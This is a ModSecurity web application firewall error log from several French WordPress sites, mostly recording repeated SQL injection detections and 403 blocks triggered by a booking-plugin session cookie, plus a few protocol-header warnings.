[Mon May 11 18:30:17.331515 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEGQ-Qm4vhlWBPlMjlVgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:17.331787 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEGQ-Qm4vhlWBPlMjlVgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:17.720046 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEGQ-Qm4vhlWBPlMjlVgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:17.966137 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEGQ-Qm4vhlWBPlMjlWAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:17.966421 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEGQ-Qm4vhlWBPlMjlWAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:18.597996 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEGQ-Qm4vhlWBPlMjlWAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:18.915499 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEGg-Qm4vhlWBPlMjlWQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:18.915779 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEGg-Qm4vhlWBPlMjlWQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:19.561679 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEGg-Qm4vhlWBPlMjlWQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:19.819762 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEGw-Qm4vhlWBPlMjlWwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:19.820039 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEGw-Qm4vhlWBPlMjlWwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:20.710082 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEGw-Qm4vhlWBPlMjlWwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:20.977432 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEHA-Qm4vhlWBPlMjlXAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:20.977711 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEHA-Qm4vhlWBPlMjlXAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:21.291231 2026] [security2:error] [pid 1411201:tid 1411253] [client 43.130.100.35:57152] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "agIEHfy_GXSWIKeli0sfKAAAAIc"]
[Mon May 11 18:30:21.537518 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEHA-Qm4vhlWBPlMjlXAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:21.630608 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEHQ-Qm4vhlWBPlMjlXgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:21.630883 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEHQ-Qm4vhlWBPlMjlXgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:22.191736 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEHQ-Qm4vhlWBPlMjlXgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:22.394782 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEHg-Qm4vhlWBPlMjlXwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:22.395074 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEHg-Qm4vhlWBPlMjlXwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:22.776967 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEHg-Qm4vhlWBPlMjlXwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:23.060226 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEHw-Qm4vhlWBPlMjlZgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:23.060522 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEHw-Qm4vhlWBPlMjlZgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:23.407090 2026] [security2:error] [pid 1411201:tid 1411262] [client 43.131.23.154:55866] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ixinabourgoin.fr"] [uri "/"] [unique_id "agIEH_y_GXSWIKeli0sfMQAAAJA"]
[Mon May 11 18:30:23.786486 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEHw-Qm4vhlWBPlMjlZgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:24.116247 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEIA-Qm4vhlWBPlMjlagAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:24.116670 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEIA-Qm4vhlWBPlMjlagAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:24.916401 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEIA-Qm4vhlWBPlMjlagAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:25.277976 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEIQ-Qm4vhlWBPlMjlbgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:25.278280 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEIQ-Qm4vhlWBPlMjlbgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:25.891955 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEIQ-Qm4vhlWBPlMjlbgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:26.357389 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEIg-Qm4vhlWBPlMjlbwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:26.357674 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEIg-Qm4vhlWBPlMjlbwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:26.915586 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEIg-Qm4vhlWBPlMjlbwAAAAM"], referer: https://rentparadise.fr/wp-login.php
